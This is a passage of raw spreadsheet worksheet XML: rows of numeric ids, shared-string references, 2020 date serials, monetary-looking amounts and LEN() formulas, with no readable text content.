        <v>16360</v>
      </c>
      <c r="D1136" t="s">
        <v>16361</v>
      </c>
      <c r="E1136">
        <v>26</v>
      </c>
      <c r="F1136" t="s">
        <v>364</v>
      </c>
      <c r="G1136" s="1">
        <v>43880</v>
      </c>
      <c r="H1136" s="4">
        <v>7300000</v>
      </c>
      <c r="J1136" t="s">
        <v>9456</v>
      </c>
      <c r="K1136">
        <f>LEN(I1136)</f>
        <v>0</v>
      </c>
      <c r="L1136">
        <f>LEN(J1136)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1137" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1137">
        <v>17011</v>
      </c>
      <c r="B1137">
        <v>1444</v>
      </c>
      <c r="C1137" t="s">
        <v>16360</v>
      </c>
      <c r="D1137" t="s">
        <v>16361</v>
      </c>
      <c r="E1137">
        <v>26</v>
      </c>
      <c r="F1137" t="s">
        <v>9617</v>
      </c>
      <c r="G1137" s="1">
        <v>43880</v>
      </c>
      <c r="H1137" s="4">
        <v>7300000</v>
      </c>
      <c r="J1137" t="s">
        <v>9456</v>
      </c>
      <c r="K1137">
        <f>LEN(I1137)</f>
        <v>0</v>
      </c>
      <c r="L1137">
        <f>LEN(J1137)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1138" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1138">
        <v>17013</v>
      </c>
      <c r="B1138">
        <v>1444</v>
      </c>
      <c r="C1138" t="s">
        <v>16360</v>
      </c>
      <c r="D1138" t="s">
        <v>16361</v>
      </c>
      <c r="E1138">
        <v>26</v>
      </c>
      <c r="F1138" t="s">
        <v>9618</v>
      </c>
      <c r="G1138" s="1">
        <v>43880</v>
      </c>
      <c r="H1138" s="4">
        <v>7300000</v>
      </c>
      <c r="J1138" t="s">
        <v>9456</v>
      </c>
      <c r="K1138">
        <f>LEN(I1138)</f>
        <v>0</v>
      </c>
      <c r="L1138">
        <f>LEN(J1138)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1139" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1139">
        <v>17068</v>
      </c>
      <c r="B1139">
        <v>2302</v>
      </c>
      <c r="C1139" t="s">
        <v>6820</v>
      </c>
      <c r="D1139" t="s">
        <v>9647</v>
      </c>
      <c r="E1139">
        <v>13</v>
      </c>
      <c r="F1139" t="s">
        <v>9648</v>
      </c>
      <c r="G1139" s="1">
        <v>43872</v>
      </c>
      <c r="H1139">
        <v>0</v>
      </c>
      <c r="J1139" t="s">
        <v>9478</v>
      </c>
      <c r="K1139">
        <f>LEN(I1139)</f>
        <v>0</v>
      </c>
      <c r="L1139">
        <f>LEN(J1139)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1140" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1140">
        <v>17134</v>
      </c>
      <c r="B1140">
        <v>368</v>
      </c>
      <c r="C1140" t="s">
        <v>1436</v>
      </c>
      <c r="D1140" t="s">
        <v>9671</v>
      </c>
      <c r="E1140">
        <v>14</v>
      </c>
      <c r="F1140" t="s">
        <v>9676</v>
      </c>
      <c r="G1140" s="1">
        <v>43871</v>
      </c>
      <c r="H1140">
        <v>30000</v>
      </c>
      <c r="J1140" t="s">
        <v>9456</v>
      </c>
      <c r="K1140">
        <f>LEN(I1140)</f>
        <v>0</v>
      </c>
      <c r="L1140">
        <f>LEN(J1140)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1141" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1141">
        <v>17135</v>
      </c>
      <c r="B1141">
        <v>368</v>
      </c>
      <c r="C1141" t="s">
        <v>1436</v>
      </c>
      <c r="D1141" t="s">
        <v>9671</v>
      </c>
      <c r="E1141">
        <v>14</v>
      </c>
      <c r="F1141" t="s">
        <v>9677</v>
      </c>
      <c r="G1141" s="1">
        <v>43871</v>
      </c>
      <c r="H1141">
        <v>154000</v>
      </c>
      <c r="J1141" t="s">
        <v>9456</v>
      </c>
      <c r="K1141">
        <f>LEN(I1141)</f>
        <v>0</v>
      </c>
      <c r="L1141">
        <f>LEN(J1141)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1142" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1142">
        <v>17295</v>
      </c>
      <c r="B1142">
        <v>1028</v>
      </c>
      <c r="C1142" t="s">
        <v>2780</v>
      </c>
      <c r="D1142" t="s">
        <v>9760</v>
      </c>
      <c r="E1142">
        <v>16</v>
      </c>
      <c r="F1142" t="s">
        <v>9761</v>
      </c>
      <c r="G1142" s="1">
        <v>43864</v>
      </c>
      <c r="H1142">
        <v>20000</v>
      </c>
      <c r="J1142" t="s">
        <v>9478</v>
      </c>
      <c r="K1142">
        <f>LEN(I1142)</f>
        <v>0</v>
      </c>
      <c r="L1142">
        <f>LEN(J1142)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1143" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1143">
        <v>19250</v>
      </c>
      <c r="B1143">
        <v>1238</v>
      </c>
      <c r="C1143" t="s">
        <v>344</v>
      </c>
      <c r="D1143" t="s">
        <v>9467</v>
      </c>
      <c r="E1143">
        <v>16</v>
      </c>
      <c r="F1143" t="s">
        <v>9441</v>
      </c>
      <c r="G1143" s="1">
        <v>43922</v>
      </c>
      <c r="H1143">
        <v>700000</v>
      </c>
      <c r="J1143" t="s">
        <v>9456</v>
      </c>
      <c r="K1143">
        <f>LEN(I1143)</f>
        <v>0</v>
      </c>
      <c r="L1143">
        <f>LEN(J1143)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1144" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1144">
        <v>19262</v>
      </c>
      <c r="B1144">
        <v>2362</v>
      </c>
      <c r="C1144" t="s">
        <v>4825</v>
      </c>
      <c r="D1144" t="s">
        <v>9886</v>
      </c>
      <c r="E1144">
        <v>16</v>
      </c>
      <c r="F1144" t="s">
        <v>1746</v>
      </c>
      <c r="G1144" s="1">
        <v>43878</v>
      </c>
      <c r="H1144">
        <v>270000</v>
      </c>
      <c r="J1144" t="s">
        <v>9478</v>
      </c>
      <c r="K1144">
        <f>LEN(I1144)</f>
        <v>0</v>
      </c>
      <c r="L1144">
        <f>LEN(J1144)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1145" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1145">
        <v>19263</v>
      </c>
      <c r="B1145">
        <v>2362</v>
      </c>
      <c r="C1145" t="s">
        <v>4825</v>
      </c>
      <c r="D1145" t="s">
        <v>9886</v>
      </c>
      <c r="E1145">
        <v>16</v>
      </c>
      <c r="F1145" t="s">
        <v>9887</v>
      </c>
      <c r="G1145" s="1">
        <v>43878</v>
      </c>
      <c r="H1145">
        <v>8000</v>
      </c>
      <c r="J1145" t="s">
        <v>9478</v>
      </c>
      <c r="K1145">
        <f>LEN(I1145)</f>
        <v>0</v>
      </c>
      <c r="L1145">
        <f>LEN(J1145)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1146" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1146">
        <v>19362</v>
      </c>
      <c r="B1146">
        <v>590</v>
      </c>
      <c r="C1146" t="s">
        <v>9958</v>
      </c>
      <c r="D1146" t="s">
        <v>9959</v>
      </c>
      <c r="E1146">
        <v>26</v>
      </c>
      <c r="F1146" t="s">
        <v>4686</v>
      </c>
      <c r="G1146" s="1">
        <v>43871</v>
      </c>
      <c r="H1146">
        <v>14400</v>
      </c>
      <c r="J1146" t="s">
        <v>9478</v>
      </c>
      <c r="K1146">
        <f>LEN(I1146)</f>
        <v>0</v>
      </c>
      <c r="L1146">
        <f>LEN(J1146)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1147" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1147">
        <v>19472</v>
      </c>
      <c r="B1147">
        <v>2196</v>
      </c>
      <c r="C1147" t="s">
        <v>4994</v>
      </c>
      <c r="D1147" t="s">
        <v>10068</v>
      </c>
      <c r="E1147">
        <v>16</v>
      </c>
      <c r="F1147" t="s">
        <v>2105</v>
      </c>
      <c r="G1147" s="1">
        <v>43922</v>
      </c>
      <c r="H1147">
        <v>700000000</v>
      </c>
      <c r="J1147" t="s">
        <v>10069</v>
      </c>
      <c r="K1147">
        <f>LEN(I1147)</f>
        <v>0</v>
      </c>
      <c r="L1147">
        <f>LEN(J1147)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1148" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1148">
        <v>19594</v>
      </c>
      <c r="B1148">
        <v>655</v>
      </c>
      <c r="C1148" t="s">
        <v>439</v>
      </c>
      <c r="D1148" t="s">
        <v>10120</v>
      </c>
      <c r="E1148">
        <v>2</v>
      </c>
      <c r="F1148" t="s">
        <v>9437</v>
      </c>
      <c r="G1148" s="1">
        <v>43885</v>
      </c>
      <c r="H1148">
        <v>120000</v>
      </c>
      <c r="J1148" t="s">
        <v>9456</v>
      </c>
      <c r="K1148">
        <f>LEN(I1148)</f>
        <v>0</v>
      </c>
      <c r="L1148">
        <f>LEN(J1148)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1149" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1149">
        <v>19595</v>
      </c>
      <c r="B1149">
        <v>655</v>
      </c>
      <c r="C1149" t="s">
        <v>439</v>
      </c>
      <c r="D1149" t="s">
        <v>10120</v>
      </c>
      <c r="E1149">
        <v>2</v>
      </c>
      <c r="F1149" t="s">
        <v>1746</v>
      </c>
      <c r="G1149" s="1">
        <v>43885</v>
      </c>
      <c r="H1149">
        <v>20000</v>
      </c>
      <c r="J1149" t="s">
        <v>9456</v>
      </c>
      <c r="K1149">
        <f>LEN(I1149)</f>
        <v>0</v>
      </c>
      <c r="L1149">
        <f>LEN(J1149)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1150" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1150">
        <v>19668</v>
      </c>
      <c r="B1150">
        <v>2550</v>
      </c>
      <c r="C1150" t="s">
        <v>5066</v>
      </c>
      <c r="D1150" t="s">
        <v>10161</v>
      </c>
      <c r="E1150">
        <v>27</v>
      </c>
      <c r="F1150" t="s">
        <v>10165</v>
      </c>
      <c r="G1150" s="1">
        <v>43886</v>
      </c>
      <c r="H1150">
        <v>1000000</v>
      </c>
      <c r="J1150" t="s">
        <v>9456</v>
      </c>
      <c r="K1150">
        <f>LEN(I1150)</f>
        <v>0</v>
      </c>
      <c r="L1150">
        <f>LEN(J1150)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1151" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1151">
        <v>19672</v>
      </c>
      <c r="B1151">
        <v>1405</v>
      </c>
      <c r="C1151" t="s">
        <v>2744</v>
      </c>
      <c r="D1151" t="s">
        <v>10168</v>
      </c>
      <c r="E1151">
        <v>16</v>
      </c>
      <c r="F1151" t="s">
        <v>9523</v>
      </c>
      <c r="G1151" s="1">
        <v>43875</v>
      </c>
      <c r="H1151">
        <v>2000</v>
      </c>
      <c r="J1151" t="s">
        <v>9478</v>
      </c>
      <c r="K1151">
        <f>LEN(I1151)</f>
        <v>0</v>
      </c>
      <c r="L1151">
        <f>LEN(J1151)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1152" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1152">
        <v>19703</v>
      </c>
      <c r="B1152">
        <v>2541</v>
      </c>
      <c r="C1152" t="s">
        <v>5254</v>
      </c>
      <c r="D1152" t="s">
        <v>10186</v>
      </c>
      <c r="E1152">
        <v>28</v>
      </c>
      <c r="F1152" t="s">
        <v>4686</v>
      </c>
      <c r="G1152" s="1">
        <v>43875</v>
      </c>
      <c r="H1152">
        <v>143000</v>
      </c>
      <c r="J1152" t="s">
        <v>9478</v>
      </c>
      <c r="K1152">
        <f>LEN(I1152)</f>
        <v>0</v>
      </c>
      <c r="L1152">
        <f>LEN(J1152)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1153" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1153">
        <v>19727</v>
      </c>
      <c r="B1153">
        <v>634</v>
      </c>
      <c r="C1153" t="s">
        <v>494</v>
      </c>
      <c r="D1153" t="s">
        <v>10205</v>
      </c>
      <c r="E1153">
        <v>2</v>
      </c>
      <c r="F1153" t="s">
        <v>1746</v>
      </c>
      <c r="G1153" s="1">
        <v>43914</v>
      </c>
      <c r="H1153">
        <v>20000</v>
      </c>
      <c r="J1153" t="s">
        <v>9456</v>
      </c>
      <c r="K1153">
        <f>LEN(I1153)</f>
        <v>0</v>
      </c>
      <c r="L1153">
        <f>LEN(J1153)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1154" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1154">
        <v>19729</v>
      </c>
      <c r="B1154">
        <v>634</v>
      </c>
      <c r="C1154" t="s">
        <v>494</v>
      </c>
      <c r="D1154" t="s">
        <v>10205</v>
      </c>
      <c r="E1154">
        <v>2</v>
      </c>
      <c r="F1154" t="s">
        <v>9892</v>
      </c>
      <c r="G1154" s="1">
        <v>43914</v>
      </c>
      <c r="H1154">
        <v>10000</v>
      </c>
      <c r="J1154" t="s">
        <v>9456</v>
      </c>
      <c r="K1154">
        <f>LEN(I1154)</f>
        <v>0</v>
      </c>
      <c r="L1154">
        <f>LEN(J1154)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1155" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1155">
        <v>19731</v>
      </c>
      <c r="B1155">
        <v>634</v>
      </c>
      <c r="C1155" t="s">
        <v>494</v>
      </c>
      <c r="D1155" t="s">
        <v>10205</v>
      </c>
      <c r="E1155">
        <v>2</v>
      </c>
      <c r="F1155" t="s">
        <v>10207</v>
      </c>
      <c r="G1155" s="1">
        <v>43914</v>
      </c>
      <c r="H1155">
        <v>25000</v>
      </c>
      <c r="J1155" t="s">
        <v>9456</v>
      </c>
      <c r="K1155">
        <f>LEN(I1155)</f>
        <v>0</v>
      </c>
      <c r="L1155">
        <f>LEN(J1155)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1156" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1156">
        <v>19738</v>
      </c>
      <c r="B1156">
        <v>1729</v>
      </c>
      <c r="C1156" t="s">
        <v>5300</v>
      </c>
      <c r="D1156" t="s">
        <v>10214</v>
      </c>
      <c r="E1156">
        <v>29</v>
      </c>
      <c r="F1156" t="s">
        <v>1455</v>
      </c>
      <c r="G1156" s="1">
        <v>43997</v>
      </c>
      <c r="H1156">
        <v>100000</v>
      </c>
      <c r="J1156" t="s">
        <v>9478</v>
      </c>
      <c r="K1156">
        <f>LEN(I1156)</f>
        <v>0</v>
      </c>
      <c r="L1156">
        <f>LEN(J1156)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1157" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1157">
        <v>19803</v>
      </c>
      <c r="B1157">
        <v>226</v>
      </c>
      <c r="C1157" t="s">
        <v>502</v>
      </c>
      <c r="D1157" t="s">
        <v>10242</v>
      </c>
      <c r="E1157">
        <v>16</v>
      </c>
      <c r="F1157" t="s">
        <v>10251</v>
      </c>
      <c r="G1157" s="1">
        <v>43922</v>
      </c>
      <c r="H1157">
        <v>58214</v>
      </c>
      <c r="J1157" t="s">
        <v>10252</v>
      </c>
      <c r="K1157">
        <f>LEN(I1157)</f>
        <v>0</v>
      </c>
      <c r="L1157">
        <f>LEN(J1157)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1158" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1158">
        <v>19985</v>
      </c>
      <c r="B1158">
        <v>2660</v>
      </c>
      <c r="C1158" t="s">
        <v>5545</v>
      </c>
      <c r="D1158" t="s">
        <v>10375</v>
      </c>
      <c r="E1158">
        <v>16</v>
      </c>
      <c r="F1158" t="s">
        <v>364</v>
      </c>
      <c r="G1158" s="1">
        <v>43900</v>
      </c>
      <c r="H1158">
        <v>80000</v>
      </c>
      <c r="J1158" t="s">
        <v>9456</v>
      </c>
      <c r="K1158">
        <f>LEN(I1158)</f>
        <v>0</v>
      </c>
      <c r="L1158">
        <f>LEN(J1158)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1159" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1159">
        <v>20108</v>
      </c>
      <c r="B1159">
        <v>46</v>
      </c>
      <c r="C1159" t="s">
        <v>658</v>
      </c>
      <c r="D1159" t="s">
        <v>10470</v>
      </c>
      <c r="E1159">
        <v>12</v>
      </c>
      <c r="F1159" t="s">
        <v>10478</v>
      </c>
      <c r="G1159" s="1">
        <v>43928</v>
      </c>
      <c r="H1159">
        <v>1000</v>
      </c>
      <c r="J1159" t="s">
        <v>9478</v>
      </c>
      <c r="K1159">
        <f>LEN(I1159)</f>
        <v>0</v>
      </c>
      <c r="L1159">
        <f>LEN(J1159)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1160" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1160">
        <v>20119</v>
      </c>
      <c r="B1160">
        <v>280</v>
      </c>
      <c r="C1160" t="s">
        <v>702</v>
      </c>
      <c r="D1160" t="s">
        <v>10484</v>
      </c>
      <c r="E1160">
        <v>16</v>
      </c>
      <c r="F1160" t="s">
        <v>10251</v>
      </c>
      <c r="G1160" s="1">
        <v>44176</v>
      </c>
      <c r="H1160">
        <v>7500</v>
      </c>
      <c r="J1160" t="s">
        <v>9478</v>
      </c>
      <c r="K1160">
        <f>LEN(I1160)</f>
        <v>0</v>
      </c>
      <c r="L1160">
        <f>LEN(J1160)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1161" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1161">
        <v>20138</v>
      </c>
      <c r="B1161">
        <v>2649</v>
      </c>
      <c r="C1161" t="s">
        <v>1035</v>
      </c>
      <c r="D1161" t="s">
        <v>10499</v>
      </c>
      <c r="E1161">
        <v>14</v>
      </c>
      <c r="F1161" t="s">
        <v>6513</v>
      </c>
      <c r="G1161" s="1">
        <v>44048</v>
      </c>
      <c r="H1161">
        <v>90000</v>
      </c>
      <c r="J1161" t="s">
        <v>9478</v>
      </c>
      <c r="K1161">
        <f>LEN(I1161)</f>
        <v>0</v>
      </c>
      <c r="L1161">
        <f>LEN(J1161)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1162" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1162">
        <v>20139</v>
      </c>
      <c r="B1162">
        <v>2649</v>
      </c>
      <c r="C1162" t="s">
        <v>1035</v>
      </c>
      <c r="D1162" t="s">
        <v>10499</v>
      </c>
      <c r="E1162">
        <v>14</v>
      </c>
      <c r="F1162" t="s">
        <v>9598</v>
      </c>
      <c r="G1162" s="1">
        <v>44048</v>
      </c>
      <c r="H1162">
        <v>40000</v>
      </c>
      <c r="J1162" t="s">
        <v>9478</v>
      </c>
      <c r="K1162">
        <f>LEN(I1162)</f>
        <v>0</v>
      </c>
      <c r="L1162">
        <f>LEN(J1162)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1163" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1163">
        <v>20163</v>
      </c>
      <c r="B1163">
        <v>2705</v>
      </c>
      <c r="C1163" t="s">
        <v>5703</v>
      </c>
      <c r="D1163" t="s">
        <v>10520</v>
      </c>
      <c r="E1163">
        <v>14</v>
      </c>
      <c r="F1163" t="s">
        <v>5705</v>
      </c>
      <c r="G1163" s="1">
        <v>44076</v>
      </c>
      <c r="H1163">
        <v>600000</v>
      </c>
      <c r="J1163" t="s">
        <v>9478</v>
      </c>
      <c r="K1163">
        <f>LEN(I1163)</f>
        <v>0</v>
      </c>
      <c r="L1163">
        <f>LEN(J1163)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1164" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1164">
        <v>20186</v>
      </c>
      <c r="B1164">
        <v>2676</v>
      </c>
      <c r="C1164" t="s">
        <v>5653</v>
      </c>
      <c r="D1164" t="s">
        <v>10521</v>
      </c>
      <c r="E1164">
        <v>17</v>
      </c>
      <c r="F1164" t="s">
        <v>4686</v>
      </c>
      <c r="G1164" s="1">
        <v>43990</v>
      </c>
      <c r="H1164">
        <v>0</v>
      </c>
      <c r="J1164" t="s">
        <v>9478</v>
      </c>
      <c r="K1164">
        <f>LEN(I1164)</f>
        <v>0</v>
      </c>
      <c r="L1164">
        <f>LEN(J1164)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1165" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1165">
        <v>20190</v>
      </c>
      <c r="B1165">
        <v>2657</v>
      </c>
      <c r="C1165" t="s">
        <v>5710</v>
      </c>
      <c r="D1165" t="s">
        <v>10535</v>
      </c>
      <c r="E1165">
        <v>26</v>
      </c>
      <c r="F1165" t="s">
        <v>673</v>
      </c>
      <c r="G1165" s="1">
        <v>43900</v>
      </c>
      <c r="H1165">
        <v>110000</v>
      </c>
      <c r="J1165" t="s">
        <v>9478</v>
      </c>
      <c r="K1165">
        <f>LEN(I1165)</f>
        <v>0</v>
      </c>
      <c r="L1165">
        <f>LEN(J1165)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1166" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1166">
        <v>20191</v>
      </c>
      <c r="B1166">
        <v>2657</v>
      </c>
      <c r="C1166" t="s">
        <v>5710</v>
      </c>
      <c r="D1166" t="s">
        <v>10535</v>
      </c>
      <c r="E1166">
        <v>26</v>
      </c>
      <c r="F1166" t="s">
        <v>9441</v>
      </c>
      <c r="G1166" s="1">
        <v>43900</v>
      </c>
      <c r="H1166">
        <v>192000</v>
      </c>
      <c r="J1166" t="s">
        <v>9478</v>
      </c>
      <c r="K1166">
        <f>LEN(I1166)</f>
        <v>0</v>
      </c>
      <c r="L1166">
        <f>LEN(J1166)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1167" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1167">
        <v>20192</v>
      </c>
      <c r="B1167">
        <v>2657</v>
      </c>
      <c r="C1167" t="s">
        <v>5710</v>
      </c>
      <c r="D1167" t="s">
        <v>10535</v>
      </c>
      <c r="E1167">
        <v>26</v>
      </c>
      <c r="F1167" t="s">
        <v>10007</v>
      </c>
      <c r="G1167" s="1">
        <v>43900</v>
      </c>
      <c r="H1167">
        <v>240000</v>
      </c>
      <c r="J1167" t="s">
        <v>9478</v>
      </c>
      <c r="K1167">
        <f>LEN(I1167)</f>
        <v>0</v>
      </c>
      <c r="L1167">
        <f>LEN(J1167)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1168" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1168">
        <v>20222</v>
      </c>
      <c r="B1168">
        <v>2609</v>
      </c>
      <c r="C1168" t="s">
        <v>5768</v>
      </c>
      <c r="D1168" t="s">
        <v>10560</v>
      </c>
      <c r="E1168">
        <v>16</v>
      </c>
      <c r="F1168" t="s">
        <v>10563</v>
      </c>
      <c r="G1168" s="1">
        <v>43922</v>
      </c>
      <c r="H1168">
        <v>5000</v>
      </c>
      <c r="J1168" t="s">
        <v>9478</v>
      </c>
      <c r="K1168">
        <f>LEN(I1168)</f>
        <v>0</v>
      </c>
      <c r="L1168">
        <f>LEN(J1168)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1169" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1169">
        <v>20240</v>
      </c>
      <c r="B1169">
        <v>163</v>
      </c>
      <c r="C1169" t="s">
        <v>807</v>
      </c>
      <c r="D1169" t="s">
        <v>10574</v>
      </c>
      <c r="E1169">
        <v>14</v>
      </c>
      <c r="F1169" t="s">
        <v>10575</v>
      </c>
      <c r="G1169" s="1">
        <v>43985</v>
      </c>
      <c r="H1169">
        <v>15000</v>
      </c>
      <c r="J1169" t="s">
        <v>9478</v>
      </c>
      <c r="K1169">
        <f>LEN(I1169)</f>
        <v>0</v>
      </c>
      <c r="L1169">
        <f>LEN(J1169)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1170" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1170">
        <v>20241</v>
      </c>
      <c r="B1170">
        <v>163</v>
      </c>
      <c r="C1170" t="s">
        <v>807</v>
      </c>
      <c r="D1170" t="s">
        <v>10574</v>
      </c>
      <c r="E1170">
        <v>14</v>
      </c>
      <c r="F1170" t="s">
        <v>10071</v>
      </c>
      <c r="G1170" s="1">
        <v>43985</v>
      </c>
      <c r="H1170">
        <v>40000</v>
      </c>
      <c r="J1170" t="s">
        <v>9478</v>
      </c>
      <c r="K1170">
        <f>LEN(I1170)</f>
        <v>0</v>
      </c>
      <c r="L1170">
        <f>LEN(J1170)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1171" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1171">
        <v>20243</v>
      </c>
      <c r="B1171">
        <v>163</v>
      </c>
      <c r="C1171" t="s">
        <v>807</v>
      </c>
      <c r="D1171" t="s">
        <v>10574</v>
      </c>
      <c r="E1171">
        <v>14</v>
      </c>
      <c r="F1171" t="s">
        <v>10576</v>
      </c>
      <c r="G1171" s="1">
        <v>43987</v>
      </c>
      <c r="H1171">
        <v>25000</v>
      </c>
      <c r="J1171" t="s">
        <v>9478</v>
      </c>
      <c r="K1171">
        <f>LEN(I1171)</f>
        <v>0</v>
      </c>
      <c r="L1171">
        <f>LEN(J1171)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1172" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1172">
        <v>20244</v>
      </c>
      <c r="B1172">
        <v>163</v>
      </c>
      <c r="C1172" t="s">
        <v>807</v>
      </c>
      <c r="D1172" t="s">
        <v>10574</v>
      </c>
      <c r="E1172">
        <v>14</v>
      </c>
      <c r="F1172" t="s">
        <v>9595</v>
      </c>
      <c r="G1172" s="1">
        <v>43985</v>
      </c>
      <c r="H1172">
        <v>3600</v>
      </c>
      <c r="J1172" t="s">
        <v>9478</v>
      </c>
      <c r="K1172">
        <f>LEN(I1172)</f>
        <v>0</v>
      </c>
      <c r="L1172">
        <f>LEN(J1172)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1173" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1173">
        <v>20245</v>
      </c>
      <c r="B1173">
        <v>163</v>
      </c>
      <c r="C1173" t="s">
        <v>807</v>
      </c>
      <c r="D1173" t="s">
        <v>10574</v>
      </c>
      <c r="E1173">
        <v>14</v>
      </c>
      <c r="F1173" t="s">
        <v>10577</v>
      </c>
      <c r="G1173" s="1">
        <v>43985</v>
      </c>
      <c r="H1173">
        <v>3600</v>
      </c>
      <c r="J1173" t="s">
        <v>9478</v>
      </c>
      <c r="K1173">
        <f>LEN(I1173)</f>
        <v>0</v>
      </c>
      <c r="L1173">
        <f>LEN(J1173)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1174" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1174">
        <v>20261</v>
      </c>
      <c r="B1174">
        <v>596</v>
      </c>
      <c r="C1174" t="s">
        <v>835</v>
      </c>
      <c r="D1174" t="s">
        <v>10583</v>
      </c>
      <c r="E1174">
        <v>12</v>
      </c>
      <c r="F1174" t="s">
        <v>10586</v>
      </c>
      <c r="G1174" s="1">
        <v>43959</v>
      </c>
      <c r="H1174">
        <v>100000</v>
      </c>
      <c r="J1174" t="s">
        <v>9456</v>
      </c>
      <c r="K1174">
        <f>LEN(I1174)</f>
        <v>0</v>
      </c>
      <c r="L1174">
        <f>LEN(J1174)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1175" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1175">
        <v>20282</v>
      </c>
      <c r="B1175">
        <v>2676</v>
      </c>
      <c r="C1175" t="s">
        <v>5653</v>
      </c>
      <c r="D1175" t="s">
        <v>10521</v>
      </c>
      <c r="E1175">
        <v>17</v>
      </c>
      <c r="F1175" t="s">
        <v>10597</v>
      </c>
      <c r="G1175" s="1">
        <v>43990</v>
      </c>
      <c r="H1175">
        <v>3500</v>
      </c>
      <c r="J1175" t="s">
        <v>9478</v>
      </c>
      <c r="K1175">
        <f>LEN(I1175)</f>
        <v>0</v>
      </c>
      <c r="L1175">
        <f>LEN(J1175)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1176" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1176">
        <v>20384</v>
      </c>
      <c r="B1176">
        <v>532</v>
      </c>
      <c r="C1176" t="s">
        <v>982</v>
      </c>
      <c r="D1176" t="s">
        <v>10675</v>
      </c>
      <c r="E1176">
        <v>12</v>
      </c>
      <c r="F1176" t="s">
        <v>4686</v>
      </c>
      <c r="G1176" s="1">
        <v>43949</v>
      </c>
      <c r="H1176">
        <v>120000</v>
      </c>
      <c r="J1176" t="s">
        <v>10677</v>
      </c>
      <c r="K1176">
        <f>LEN(I1176)</f>
        <v>0</v>
      </c>
      <c r="L1176">
        <f>LEN(J1176)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1177" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1177">
        <v>20404</v>
      </c>
      <c r="B1177">
        <v>2735</v>
      </c>
      <c r="C1177" t="s">
        <v>6882</v>
      </c>
      <c r="D1177" t="s">
        <v>10689</v>
      </c>
      <c r="E1177">
        <v>13</v>
      </c>
      <c r="F1177" t="s">
        <v>9592</v>
      </c>
      <c r="G1177" s="1">
        <v>44074</v>
      </c>
      <c r="H1177">
        <v>50000</v>
      </c>
      <c r="J1177" t="s">
        <v>9456</v>
      </c>
      <c r="K1177">
        <f>LEN(I1177)</f>
        <v>0</v>
      </c>
      <c r="L1177">
        <f>LEN(J1177)</f>
        <v>5</v>
      </c>
